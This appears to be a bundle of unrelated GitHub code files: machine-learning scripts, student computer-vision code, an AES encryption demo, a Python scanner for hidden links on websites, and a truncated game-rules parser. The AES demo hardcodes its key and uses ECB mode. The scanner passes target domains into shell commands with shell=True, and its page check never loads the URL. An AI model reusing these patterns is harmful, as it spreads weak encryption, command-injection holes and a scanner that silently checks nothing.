\"db\"\n\n","repo_name":"FaithTechLabs/suicide-prevention","sub_path":"core_site/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"74343404232","text":"__author__ = 'ericrincon'\n\nfrom gensim.models import Doc2Vec\nfrom NeuralNet import NeuralNet\nfrom os import listdir\nfrom os.path import isfile, join\nfrom DataLoader import DataLoader\nfrom gensim import utils\nimport sys\nimport numpy\n\n\"\"\"\n Create an empty string of parameter length.\n Used in conjunction with python's translation method to, in this case, pre-process text\n for Doc2Vec.\n\"\"\"\ndef create_whitespace(length):\n whitespace = ''\n\n for i in range(length):\n whitespace += ' '\n\n return whitespace\n\n\ndef preprocess(line):\n punctuation = \"`~!@#$%^&*()_-=+[]{}\\|;:'\\\"|<>,./?åαβ\"\n numbers = \"1234567890\"\n number_replacement = create_whitespace(len(numbers))\n spacing = create_whitespace(len(punctuation))\n\n lowercase_line = line.lower()\n translation_table = str.maketrans(punctuation, spacing)\n translated_line = lowercase_line.translate(translation_table)\n translation_table_numbers = str.maketrans(numbers, number_replacement)\n final_line = translated_line.translate(translation_table_numbers)\n line_tokens = utils.to_unicode(final_line).split()\n\n return set(line_tokens)\n\ndef main():\n model = Doc2Vec.load('400_pvdm_doc2vec.d2v')\n model_dbow = Doc2Vec.load('400_pvdbow_doc2vec.d2v')\n #mistake pvdm is actually pv-dbow\n path = 'datasets/'\n\n files = [f for f in listdir(path) if isfile(join(path,f))]\n files.pop(0)\n\n data_loader = DataLoader(path)\n\n domains = data_loader.csv_files\n\n\n names = {1: 'title', 4: 'abstract', 5: 'mesh', 'y': 6}\n\n domain_features = data_loader.get_feature_matrix(names)\n\n #get size\n n_total_documents = 0\n\n for domain in domain_features:\n n_total_documents+=len(domain[0])\n\n all_features = numpy.zeros(shape=(n_total_documents, 800))\n all_labels = numpy.asarray([])\n i = 0\n\n for domain in domain_features:\n features, labels = domain\n all_labels = numpy.hstack((all_labels, labels))\n for feature_vector in features:\n preprocessed_line = list(preprocess(feature_vector))\n all_features[i, 0:400] = numpy.float_(model.infer_vector(preprocessed_line))\n all_features[i, 400:] = numpy.float_(model_dbow.infer_vector(preprocessed_line))\n i+=1\n all_labels = numpy.asarray(all_labels)\n all_labels[all_labels == -1] = 0\n all_labels = numpy.intc(all_labels)\n train, test = data_loader.create_random_samples(all_features, all_labels)\n train_x, train_y = train\n test_x, test_y = test\n\n classifier = NeuralNet(n_hidden_units=[200], output_size=2, batch_size=20, n_epochs=200, dropout=True,\n activation_function='relu', learning_rate=.3, momentum=True, momentum_term=.5)\n\n classifier.train(train_x, train_y)\n classifier.test(test_x, test_y)\n\nif __name__ == '__main__':\n main()","repo_name":"ericrincon/Deep-Learning-NLP","sub_path":"Doc2VecClassifier.py","file_name":"Doc2VecClassifier.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"33509809438","text":"import numpy as np\n\ninputs = [[-1, 0.1, 0.4, 0.7], [-1, 0.3, 0.7, 0.2], [-1, 0.6, 0.9, 0.8], [-1, 0.5, 0.7, 0.1]]\nlabels = [1, -1, -1, 1]\nweights = [0, 0, 0, 0]\n\nlearningRate = 1\noutput = []\nepochs = 0\nmaxEpochs = 1000\n\ndef sinal(elem):\n if elem > 0:\n return 1\n\n return -1\n\n\nwhile len(output) < len(inputs) or epochs == maxEpochs:\n output = []\n epochs = epochs + 1\n\n for input, label in zip(inputs, labels):\n u = np.dot(input, weights)\n y = sinal(u)\n\n err = label - y\n\n if err != 0:\n for widx in range(len(inputs)):\n # w <- w + N * (d[i] - y) * x[i]\n weights[widx] = weights[widx] + learningRate * err * input[widx]\n else:\n output.append(y)\n\n\nprint(\"FINAL WEIGHTS\", weights)\n\n\n\n","repo_name":"ronebrandao/neural-networks","sub_path":"Python/SimplePerceptron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73750052231","text":"import mxnet as mx\nimport numpy as np\nimport sys\n\nclass TruncatedSentenceIter(mx.io.DataIter):\n\n\tdef __init__(self, train_sets, batch_size, init_states, truncate_len, delay,\n\t\t\t\t feat_dim, label_dim, data_name, label_name,\n\t\t\t\t do_shuffling, pad_zeros):\n\n\t\tself.train_sets = train_sets\n\t\tself.data_name = data_name\n\t\tself.label_name = label_name\n\n\t\tself.feat_dim = feat_dim\n\t\tself.label_dim = label_dim\n\n\t\tself.batch_size = batch_size\n\t\tself.truncate_len = truncate_len\n\t\tself.delay = delay\n\n\n\t\tself.do_shuffling = do_shuffling\n\t\tself.pad_zeros = pad_zeros\n\n\t\tself.data = [mx.nd.zeros((batch_size, truncate_len, feat_dim))]\n\t\tself.label = [mx.nd.zeros((batch_size, truncate_len, label_dim))]\n\n\t\tself.init_state_names = [x[0] for x in init_states]\n\t\tself.init_state_arrays = [mx.nd.zeros(x[1]) for x in init_states]\n\n\t\tself.provide_data = [(data_name, self.data[0].shape)] + init_states\n\t\tself.provide_label = [(label_name, self.label[0].shape)]\n\n\t\tself._load_data()\n\t\tself._make_data_plan()\n\n\tdef _load_data(self):\n\t\tsys.stderr.write('Loading data into memory...\\n')\n\t\tself.features = []\n\t\tself.labels = []\n\t\tself.utt_ids = []\n\n\t\tseq_len_tot = 0.0\n\t\tfor i in range (len(self.train_sets)):\n\t\t\tself.train_sets[i].initialize_read()\n\t\t\twhile True:\n\t\t\t\t(feats, tgs, utt_id) = self.train_sets[i].load_next_seq()\n\t\t\t\tif utt_id is None:\n\t\t\t\t\tbreak\n\t\t\t\tif tgs is None and self.has_label:\n\t\t\t\t\tcontinue\n\t\t\t\tif feats.shape[0] == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\ttgs[self.delay:] = tgs[:-self.delay]\n\t\t\t\ttgs[:self.delay] = tgs[0]\n\n\t\t\t\tself.features.append(feats)\n\t\t\t\tself.labels.append(tgs+1)\n\t\t\t\tself.utt_ids.append(utt_id)\n\t\t\t\tseq_len_tot += feats.shape[0]\n\n\t\t\tsys.stderr.write('\t%d frames loaded...\\n' % len(self.features))\n\t\t\tsys.stderr.write('\t%d utterances loaded...\\n' % len(self.utt_ids))\n\t\t\tsys.stderr.write('\tavg-sequence-len = %.0f\\n' % (seq_len_tot/len(self.utt_ids)))\n\n\tdef _make_data_plan(self):\n\t\tif self.do_shuffling:\n\t\t\t# TODO: should we group utterances of similar length together?\n\t\t\tself._data_plan = np.random.permutation(len(self.features))\n\t\telse:\n\t\t\t# we might not want to do shuffling for testing for example\n\t\t\tself._data_plan = np.arange(len(self.features))\n\n\tdef __iter__(self):\n\t\tassert len(self._data_plan) >= self.batch_size, \\\n\t\t\t\"Total number of sentences smaller than batch size, consider using smaller batch size\"\n\t\tutt_idx = self._data_plan[:self.batch_size]\n\t\tutt_inside_idx = [0] * self.batch_size\n\n\t\tnext_utt_idx = self.batch_size\n\t\tis_pad = [False] * self.batch_size\n\t\tpad = 0\n\n\t\tnp_data_buffer = np.zeros((self.batch_size, self.truncate_len, self.feat_dim))\n\t\tnp_label_buffer = np.zeros((self.batch_size, self.truncate_len, self.label_dim))\n\t\tutt_id_buffer = [None] * self.batch_size\n\n\t\tdata_names = [self.data_name] + self.init_state_names\n\t\tlabel_names = [self.label_name]\n\n\t\t# reset states\n\t\tfor state in self.init_state_arrays:\n\t\t\tstate[:] = 0.1\n\n\t\twhile True:\n\t\t\teffective_sample_count = self.batch_size * self.truncate_len\n\t\t\tfor i, idx in enumerate(utt_idx):\n\t\t\t\tfea_utt = self.features[idx]\n\t\t\t\tif utt_inside_idx[i] >= fea_utt.shape[0]:\n\t\t\t\t\t# we have consumed this sentence\n\n\t\t\t\t\t# reset the states\n\t\t\t\t\tfor state in self.init_state_arrays:\n\t\t\t\t\t\tstate[i:i+1] = 0.1\n\t\t\t\t\t# load new sentence\n\t\t\t\t\tif is_pad[i]:\n\t\t\t\t\t\t# I am already a padded sentence, just rewind to the\n\t\t\t\t\t\t# beginning of the sentece\n\t\t\t\t\t\tutt_inside_idx[i] = 0\n\t\t\t\t\telif next_utt_idx >= len(self.features):\n\t\t\t\t\t\t# we consumed the whole dataset, simply repeat this sentence\n\t\t\t\t\t\t# and set pad\n\t\t\t\t\t\tpad += 1\n\t\t\t\t\t\tis_pad[i] = True\n\t\t\t\t\t\tutt_inside_idx[i] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\t# move to the next sentence\n\t\t\t\t\t\tutt_idx[i] = self._data_plan[next_utt_idx]\n\t\t\t\t\t\tidx = utt_idx[i]\n\t\t\t\t\t\tfea_utt = self.features[idx]\n\t\t\t\t\t\tutt_inside_idx[i] = 0\n\t\t\t\t\t\tnext_utt_idx += 1\n\n\t\t\t\tif is_pad[i] and self.pad_zeros:\n\t\t\t\t\tnp_data_buffer[i] = 0\n\t\t\t\t\tnp_label_buffer[i] = 0\n\t\t\t\t\teffective_sample_count -= self.truncate_len\n\t\t\t\telse:\n\t\t\t\t\tidx_take = slice(utt_inside_idx[i],\n\t\t\t\t\t\t\t\t\t min(utt_inside_idx[i]+self.truncate_len,\n\t\t\t\t\t\t\t\t\t\t fea_utt.shape[0]))\n\t\t\t\t\tn_take = idx_take.stop - idx_take.start\n\t\t\t\t\tnp_data_buffer[i][:n_take] = fea_utt[idx_take]\n\t\t\t\t\tnp_label_buffer[i][:n_take] = self.labels[idx][idx_take]\n\t\t\t\t\tif n_take < self.truncate_len:\n\t\t\t\t\t\tnp_data_buffer[i][n_take:] = 0\n\t\t\t\t\t\tnp_label_buffer[i][n_take:] = 0\n\t\t\t\t\t\teffective_sample_count -= self.truncate_len - n_take\n\n\t\t\t\t\tutt_inside_idx[i] += n_take\n\n\t\t\t\tutt_id_buffer[i] = self.utt_ids[idx]\n\n\t\t\tif pad == self.batch_size:\n\t\t\t\t# finished all the senteces\n\t\t\t\tbreak\n\n\t\t\tself.data[0][:] = np_data_buffer\n\t\t\tself.label[0][:] = np_label_buffer\n\t\t\tdata_batch = SimpleBatch(data_names, self.data + self.init_state_arrays,\n\t\t\t\t\t\t\t\t\t label_names, self.label, bucket_key=None,\n\t\t\t\t\t\t\t\t\t utt_id=utt_id_buffer,\n\t\t\t\t\t\t\t\t\t effective_sample_count=effective_sample_count)\n\n\t\t\t# Instead of using the 'pad' property, we use an array 'is_pad'. Because\n\t\t\t# our padded sentence could be in the middle of a batch. A sample is pad\n\t\t\t# if we are running out of the data set and they are just some previously\n\t\t\t# seen data to be filled for a whole batch. In prediction, those data\n\t\t\t# should be ignored\n\t\t\tdata_batch.is_pad = is_pad\n\n\t\t\tyield data_batch\n\n\tdef reset(self):\n\t\tself._make_data_plan()\n\n\nclass SimpleBatch(object):\n\tdef __init__(self, data_names, data, label_names, label, bucket_key,\n\t\t\t\t utt_id=None, utt_len=0, effective_sample_count=None):\n\t\tself.data = data\n\t\tself.label = label\n\t\tself.data_names = data_names\n\t\tself.label_names = label_names\n\t\tself.bucket_key = bucket_key\n\t\tself.utt_id = utt_id\n\t\tself.utt_len = utt_len\n\t\tself.effective_sample_count = effective_sample_count\n\n\t\tself.pad = 0\n\t\tself.index = None # TODO: what is index?\n\n\t@property\n\tdef provide_data(self):\n\t\treturn [(n, x.shape) for n, x in zip(self.data_names, self.data)]\n\n\t@property\n\tdef provide_label(self):\n\t\treturn [(n, x.shape) for n, x in zip(self.label_names, self.label)]\n\n\n\n\n\n\n\n","repo_name":"YiAthena/DNN_TTS","sub_path":"adapt/adapt_hidden/RNN_script/io_util.py","file_name":"io_util.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"26964905036","text":"# 내가 짠 시간초과 코드\n# n = int(input())\n# res = []\n# snum = 0\n# for i in range(1,n+1):\n# for j in range(1,i+1):\n# if i % j == 0:\n# res.append(j)\n# snum += sum(list(set(res)))\n# res.clear()\n \n# print(snum)\n\n# 간단 코드\nn = int(input())\n\nfor _ in range(n):\n num = int(input())\n res = 0\n for i in range(1,num+1):\n res += (num//i)*i\n print(res, num, i)\n print(res)","repo_name":"mafls122/Python_Algorithm","sub_path":"11_Etc/baekjoon_17425_약수의 합.py","file_name":"baekjoon_17425_약수의 합.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38646706062","text":"\"\"\"\nThis file holds the main code for disparity map calculations\n\"\"\"\nimport torch\nimport numpy as np\n\nfrom typing import Callable, Tuple\n\n\ndef calculate_disparity_map(left_img: torch.Tensor,\n right_img: torch.Tensor,\n block_size: int,\n sim_measure_function: Callable,\n max_search_bound: int = 50) -> torch.Tensor:\n \"\"\"\n Calculate the disparity value at each pixel by searching a small \n patch around a pixel from the left image in the right image\n\n Note: \n 1. It is important for this project to follow the convention of search\n input in left image and search target in right image\n 2. While searching for disparity value for a patch, it may happen that there\n are multiple disparity values with the minimum value of the similarity\n measure. In that case we need to pick the smallest disparity value.\n Please check the numpy's argmin and pytorch's argmin carefully.\n Example:\n -- diparity_val -- | -- similarity error --\n -- 0 | 5 \n -- 1 | 4\n -- 2 | 7\n -- 3 | 4\n -- 4 | 12\n\n In this case we need the output to be 1 and not 3.\n 3. The max_search_bound is defined from the patch center.\n\n Args:\n - left_img: image from the left stereo camera. Torch tensor of shape (H,W,C).\n C will be >= 1.\n - right_img: image from the right stereo camera. Torch tensor of shape (H,W,C)\n - block_size: the size of the block to be used for searching between\n left and right image\n - sim_measure_function: a function to measure similarity measure between\n two tensors of the same shape; returns the error value\n - max_search_bound: the maximum horizontal distance (in terms of pixels) \n to use for searching\n Returns:\n - disparity_map: The map of disparity values at each pixel. \n Tensor of shape (H-2*(block_size//2),W-2*(block_size//2))\n \"\"\"\n\n assert left_img.shape == right_img.shape\n disparity_map = torch.zeros(left_img.shape[0] - block_size + 1, left_img.shape[1] - block_size + 1)\n ############################################################################\n # Student code begin\n ############################################################################\n\n for i in range(disparity_map.shape[0]):\n for j in range(disparity_map.shape[1]):\n if j - max_search_bound + 1< 0:\n allowed_limit = j + 1\n else:\n allowed_limit = max_search_bound\n dvals = np.array([])\n for k in range(allowed_limit):\n lpatch = left_img[i:i+block_size, j:j+block_size]\n rpatch = right_img[i:i+block_size, j-k:j-k+block_size]\n dval = sim_measure_function(lpatch, rpatch)\n dvals = np.append(dvals, dval)\n if len(dvals):\n mindval = np.argmin(dvals)\n else:\n mindval = 0\n disparity_map[i][j] = torch.tensor(mindval)\n\n ############################################################################\n # Student code end\n ############################################################################\n return disparity_map\n\ndef calculate_cost_volume(left_img: torch.Tensor,\n right_img: torch.Tensor,\n max_disparity: int,\n sim_measure_function: Callable,\n block_size: int = 9):\n \"\"\"\n Calculate the cost volume. Each pixel will have D=max_disparity cost values\n associated with it. Basically for each pixel, we compute the cost of\n different disparities and put them all into a tensor.\n\n Note: \n 1. It is important for this project to follow the convention of search\n input in left image and search target in right image\n 2. If the shifted patch in the right image will go out of bounds, it is\n good to set the default cost for that pixel and disparity to be something\n high(we recommend 255), so that when we consider costs, valid disparities will have a lower\n cost. \n\n Args:\n - left_img: image from the left stereo camera. Torch tensor of shape (H,W,C).\n C will be 1 or 3.\n - right_img: image from the right stereo camera. Torch tensor of shape (H,W,C)\n - max_disparity: represents the number of disparity values we will consider.\n 0 to max_disparity-1\n - sim_measure_function: a function to measure similarity measure between\n two tensors of the same shape; returns the error value\n - block_size: the size of the block to be used for searching between\n left and right image\n Returns:\n - cost_volume: The cost volume tensor of shape (H,W,D). H,W are image\n dimensions, and D is max_disparity. cost_volume[x,y,d] \n represents the similarity or cost between a patch around left[x,y] \n and a patch shifted by disparity d in the right image. \n \"\"\"\n #placeholder\n H = left_img.shape[0]\n W = right_img.shape[1]\n cost_volume = torch.zeros(H, W, max_disparity)\n ############################################################################\n # Student code begin\n ############################################################################\n\n for i in range(cost_volume.shape[0]-block_size+1):\n for j in range(cost_volume.shape[1]-block_size+1):\n if j - max_disparity + 1< 0:\n allowed_limit = j + 1\n else:\n allowed_limit = max_disparity\n dvals = torch.zeros(max_disparity)\n for k in range(allowed_limit):\n lpatch = left_img[i:i+block_size, j:j+block_size]\n rpatch = right_img[i:i+block_size, j-k:j-k+block_size]\n # print(lpatch.shape, rpatch.shape, i, j, k, max_disparity)\n dval = sim_measure_function(lpatch, rpatch)\n dvals[k] = int(dval)\n # print(dvals)\n cost_volume[i][j] = dvals\n\n ############################################################################\n # Student code end\n ############################################################################\n return cost_volume\n","repo_name":"shubhamdadhich/Proj5---Disparity-Calculation---CV","sub_path":"proj5_code/disparity_map.py","file_name":"disparity_map.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29792802324","text":"#!/usr/bin/python3\r\nfrom Crypto.Cipher import AES\r\n\r\n# Padding for the input string --not\r\n# related to encryption itself.\r\nBS = 16 # Bytes\r\ndef pad(s): return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)\r\ndef unpad(s): return s[:-ord(s[len(s)-1:])]\r\n\r\n\r\nclass AESCipher:\r\n def __init__(self, pol, jor):\r\n self.pol = pol\r\n self.jor = jor\r\n\r\n def encrypt(self, raw):\r\n \"\"\"\r\n Returns hex encoded encrypted value!\r\n \"\"\"\r\n raw = pad(raw)\r\n cipher = AES.new(self.pol, AES.MODE_ECB)\r\n encrypted = cipher.encrypt(raw.encode())\r\n # print(type(msg))\r\n return encrypted.hex() # .encode('hex')\r\n\r\n def decrypt(self, enc):\r\n \"\"\"\r\n Requires hex encoded param to decrypt\r\n \"\"\"\r\n enc = bytes.fromhex(enc) # .decode('hex')\r\n cipher = AES.new(self.pol, AES.MODE_ECB)\r\n decrypted = cipher.decrypt(enc)\r\n return unpad(decrypted.decode())\r\n\r\n\r\nkey = b'abcdefghijklmnop'\r\nmsg = 'Satrio_Ropel'\r\n\r\nc = AESCipher(key, msg)\r\nciphertext = c.encrypt(msg)\r\nplaintext = c.decrypt(ciphertext)\r\nprint(\"Ini adalah Ciphertextnya : \", ciphertext)\r\nprint(\"Ini adalah Plaintextnya : \", plaintext)\r\n","repo_name":"satriowibowo1701/AES-ECB-encrypt-and-decrypt","sub_path":"ecb.py","file_name":"ecb.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35235301967","text":"#!/usr/bin/python3\n# coding: utf-8\n\nimport re\nimport os\nimport argparse\nimport subprocess\nimport threading\nfrom fake_useragent import UserAgent\nfrom urllib.parse import quote\nfrom termcolor import cprint\nfrom urllib.parse import urlparse\n\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\n\nreconpath = \"recon_domains\"\nscopepath = \"scope_domains\"\n\n# 子域名文件\nsubfinder_file = \"_subfinder.txt\"\nshuffledns_file = \"_shuffledns.txt\"\nrapiddns_file = \"_rapiddns.txt\"\n# 验证结果文件\nsub_file_ok = \"_sub_ok.txt\"\n# 去重后文件\nanew_file = \"_anew_file.txt\"\n# 各个域名对应标题、状态码等信息文件\ntitle_file = \"_title.txt\"\n\nopt = Options()\nopt.add_argument('--no-sandbox') # 解决DevToolsActivePort文件不存在的报错\nopt.add_argument('window-size=1920x3000') # 设置浏览器分辨率\nopt.add_argument('--disable-gpu') # 谷歌文档提到需要加上这个属性来规避bug\nopt.add_argument('--hide-scrollbars') # 隐藏滚动条,应对一些特殊页面\nopt.add_argument('blink-settings=imagesEnabled=false') # 不加载图片,提升运行速度\nopt.add_argument('--headless') # 浏览器不提供可视化界面。Linux下如果系统不支持可视化不加这条会启动失败\nopt.add_experimental_option('excludeSwitches', ['enable-logging']) # 关闭DevTools listening on ws://127.0.0.1 日志\n\ndef radSpider(targetDomain, saveDir):\n # 爬虫\n scanCommand = \"echo {0}|./httpx -silent -mc 200,301,302 -threads -1000 |./hakrawler -d 2 -subs > {1}\".format(targetDomain, saveDir+\"domain_js.txt\")\n print(\"\\033[1;33m command>>>>>> \\033[0m\",\"\\033[1;33m\"+ scanCommand +\"\\033[0m\")\n finderjs_result = subprocess.Popen(scanCommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n finderjs_result.wait()\n\ndef All_JC(urls):\n for url in urls:\n try:\n driver = Chrome(options=opt) # 创建无界面对象\n respose = driver.page_source\n driver.close()\n rules = [] # 匹配到的标签\n host = True\n for re_rules in re_rules_list:\n chashuibiao = re.findall(r'{}'.format(re_rules), respose, re.S | re.I)\n if chashuibiao:\n rules.append(re_rules)\n host = False\n if host is False:\n with open(\"result.txt\", \"a\") as file:\n file.write('\\t地址:{}\\n\\t匹配项:{}\\n\\n'.format(url, rules))\n print('{}:{} 存在暗链!'.format(threading.current_thread().name, url))\n else:\n print('{}:{} 未检测出'.format(threading.current_thread().name, url))\n except Exception as e:\n print('{}:{}请求出错'.format(threading.current_thread().name, url))\n\ndef logo():\n logo = '''\n $$\\ \n $$ | \n $$$$$$\\ $$ |$$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$\\ $$$$$$$\\ \n \\____$$\\ $$ |\\__|$$ _____|$$ _____|$$ _____|\\____$$\\ $$ __$$\\ \n $$$$$$$ |$$ |$$\\ $$ / \\$$$$$$\\ $$ / $$$$$$$ |$$ | $$ |\n$$ __$$ |$$ |$$ |$$ | \\____$$\\ $$ | $$ __$$ |$$ | $$ |\n\\$$$$$$$ |$$ |$$ |\\$$$$$$$\\ $$$$$$$ |\\$$$$$$$\\\\$$$$$$$ |$$ | $$ |\n \\_______|\\__|$$ | \\_______|\\_______/ \\_______|\\_______|\\__| \\__|\n $$\\ $$ | \n \\$$$$$$ | \n \\______/ \n Author:tom v1.2\n '''\n return logo\n\nwith open('rules.txt', 'r', encoding='utf-8') as s:\n re_rules_list = s.read().split('\\n')\n\ndef main():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--targets', default='targets.txt',\n help='information gathering for SubDomain')\n parser.add_argument('--files', default='files',\n help='Save subDomain info to Files')\n parser.add_argument('--outname', default='test',\n help='Save outname')\n parser.add_argument('--Thread', action='store',\n type=int, default=20,\n help='Thread')\n parser.add_argument('--aljc', action='store',\n type=bool, default=False,\n help='Scan for sensitive words')\n parser.add_argument('--aljcall', action='store',\n type=bool, default=False,\n help='Scan for all sensitive words')\n\n args = parser.parse_args()\n print(args.targets)\n\n try:\n print(logo())\n saveDir = \"{}/{}/{}/\".format(os.path.dirname(os.path.abspath(__file__)), reconpath, args.files)\n\n if args.aljc:\n with open(args.targets, \"r+\") as f:\n urls_list = f.read().split('\\n')\n All_JC(urls_list)\n\n if args.aljcall:\n xc = args.Thread\n with open(args.targets, \"r\") as f:\n for i in f.readlines():\n domain = i.strip(\"\\n\")\n with open(\"result.txt\", \"a\") as file:\n file.write('目标地址:------------------({})------------------\\n\\n'.format(domain))\n radSpider(domain, saveDir)\n if os.path.exists(saveDir + \"domain_js.txt\"):\n with open(saveDir + \"domain_js.txt\", 'r') as f:\n urls_list = f.read().split('\\n')\n urls = []\n twoList = [[] for i in range(xc)]\n for i, e in enumerate(urls_list):\n twoList[i % xc].append(e)\n for i in twoList:\n urls.append(i)\n thread_list = [threading.Thread(target=All_JC, args=(urls[i],)) for i in range(len(urls))]\n for t in thread_list:\n t.start()\n for t in thread_list:\n t.join()\n\n except Exception as e:\n print(e)\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"pantom2077/aljcscan","sub_path":"aljcscan.py","file_name":"aljcscan.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"27"} +{"seq_id":"43008863780","text":"import logging\nimport traceback\nclass InvalidArgumentException(Exception):\n pass\n\n\ndef add(v1, v2):\n print(f\"add -- (1) v1: {v1}, v2: {v2}\")\n if v1 is None or v2 is None:\n raise InvalidArgumentException(\"일부러 터트렸습니다!\")\n print(f\"add -- (2) v1: {v1}, v2: {v2}\")\n\n\ndef div(v1, v2):\n print(f\"add -- (1) v1: {v1}, v2: {v2}\")\n if v1 is None or v2 is None:\n raise ZeroDivisionError(\"0으로 나눌수 없습니다!\")\n print(f\"add -- (2) v1: {v1}, v2: {v2}\")\n\n\nif __name__ == '__main__':\n try:\n print(\"Hello Python World!\")\n add(1, 2)\n add(1, None)\n print(\"try 끝점까지 도달했습니다.\")\n logging.basicConfig()\n except (InvalidArgumentException, ZeroDivisionError) as e:\n print(e)\n print(\"예외처리를 시작합니다\")\n else:\n print(\"ELSE\")\n finally:\n print(\"!\")\n\n print(\"프로그램을 종료합니다.\")\n","repo_name":"ej31/python-learning-archive","sub_path":"learning_230823/study/study_fileio_1.py","file_name":"study_fileio_1.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"37949646283","text":"import re\n\nfrom nofloat import to_int\nfrom lib.log import debug, warning\nfrom lib.defs import preprocess\n\n\nclass _Definitions:\n\n int_properties = ()\n precision_properties = ()\n int_list_properties = ()\n precision_list_properties = ()\n string_properties = ()\n\n def __init__(self):\n self._dict = {}\n\n def read(self, s):\n s = preprocess(s)\n d = self._dict\n for line in s.split(\"\\n\"):\n words = line.split()\n if not words: continue\n if words[0] == \"clear\":\n d.clear()\n elif words[0] == \"def\":\n name = words[1]\n if name not in d:\n d[name] = {}\n elif words[0] in self.string_properties:\n d[name][words[0]] = words[1]\n elif words[0] in self.int_properties:\n d[name][words[0]] = int(words[1])\n elif words[0] in self.precision_properties:\n d[name][words[0]] = to_int(words[1])\n elif words[0] in self.int_list_properties:\n d[name][words[0]] = [int(x) for x in words[1:]]\n elif words[0] in self.precision_list_properties:\n d[name][words[0]] = [to_int(x) for x in words[1:]]\n else:\n if words[0] == \"effect\" and words[1] == \"bonus\" and words[2] in self.precision_properties:\n words[3] = to_int(words[3])\n if len(words) > 4: # apparently this case doesn't happen at the moment\n words[4] = to_int(words[4])\n d[name][words[0]] = words[1:]\n\n def apply_inheritance(self, expanded_is_a=False):\n d = self._dict\n modified = True\n n = 0\n while modified:\n modified = False\n n += 1\n debug(\"*** pass %s ***\", n)\n # for every object\n for ko, o in d.items():\n if o.has_key(\"is_a\"):\n # init \"expanded_is_a\" (first pass)\n if expanded_is_a and not o.has_key(\"expanded_is_a\"):\n o[\"expanded_is_a\"] = o[\"is_a\"][:]\n debug(\"%s.%s = %s\", ko, \"expanded_is_a\", o[\"expanded_is_a\"])\n modified = True\n # for every parent\n for p in o[\"is_a\"]:\n if p in d:\n # for every attribute\n for k, v in d[p].items():\n if expanded_is_a and k == \"expanded_is_a\":\n # add parents from \"expanded_is_a\" of parent\n # (if not yet in the object's \"expanded_is_a\")\n for is_a in v:\n if is_a not in o[k]:\n o[k] += [is_a]\n debug(\"%s.%s = %s\", ko, k, o[k])\n modified = True\n elif k in d[p] and k not in o:\n # copy attribute from parent\n o[k] = v\n debug(\"%s.%s = %s\", ko, k, o[k])\n modified = True\n else:\n warning(\"error in %s.is_a: %s doesn't exist\", ko, p)\n\n def _val(self, obj, attr):\n d = self._dict\n if not d.has_key(obj):\n return\n o = d[obj]\n if not o.has_key(attr):\n if o.has_key(\"is_a\"):\n for p in o[\"is_a\"]:\n if d.has_key(p) and self._val(p, attr) is not None:\n return self._val(p, attr)\n return\n return o[attr]\n\n def get(self, obj, attr):\n d = self._dict\n v = self._val(obj, attr)\n if v is None and attr[-8:-1] == \"_level_\":\n v = self._val(obj, attr[:-8])\n if isinstance(v, list):\n v = v[:]\n return v\n\n def get_dict(self, obj):\n return self._dict[obj]\n\n def classnames(self):\n return self._dict.keys()\n\n def copy(self, other):\n self._dict = other._dict\n\n\n_precision_properties = (\n \"armor\",\n \"damage\",\n \"damage_radius\", \"range\",\n \"decay\",\n \"qty\", \"extraction_qty\",\n \"hp_max\",\n \"mana_cost\", \"mana_max\",\n \"extraction_time\",\n \"time_cost\",\n \"cooldown\",\n \"mana_regen\",\n \"speed\", \n )\n_precision_properties_extended = []\nfor _ in _precision_properties:\n _precision_properties_extended.extend((_, _ + \"_bonus\"))\nassert \"armor\" in _precision_properties_extended\nassert \"armor_bonus\" in _precision_properties_extended\n\n\nclass Rules(_Definitions):\n\n string_properties = (\"airground_type\",)\n int_properties = (\n \"collision\",\n \"corpse\",\n \"food_cost\", \"food_provided\",\n \"harm_level\",\n \"heal_level\",\n \"resource_type\",\n \"is_repairable\", \"is_healable\", \"is_vulnerable\",\n \"is_undead\",\n \"is_a_building_land\",\n \"is_buildable_anywhere\",\n \"special_range\",\n \"sight_range\",\n \"transport_capacity\",\n \"transport_volume\",\n \"is_invisible\",\n \"is_cloakable\",\n \"is_a_detector\",\n \"is_a_cloaker\",\n \"universal_notification\",\n \"presence\",\n \"provides_survival\",\n \"is_ballistic\",\n \"is_teleportable\",\n )\n precision_properties = _precision_properties_extended\n int_list_properties = (\"storable_resource_types\",)\n precision_list_properties = (\"cost\", \"storage_bonus\")\n\n def load(self, *strings):\n self._dict = {}\n for s in strings:\n s = re.sub(r\"^[ \\t]*class +faction\\b\", \"class race\", s, flags=re.M)\n self.read(s)\n self.apply_inheritance(expanded_is_a=True)\n\n def classnames(self):\n result = _Definitions.classnames(self)\n result.remove(\"parameters\")\n return result\n\n\nclass Style(_Definitions):\n\n def __init__(self):\n self._style_warnings = []\n \n def load(self, *strings):\n self._dict = {}\n for s in strings:\n self.read(s)\n self.apply_inheritance()\n\n def get(self, obj, attr, 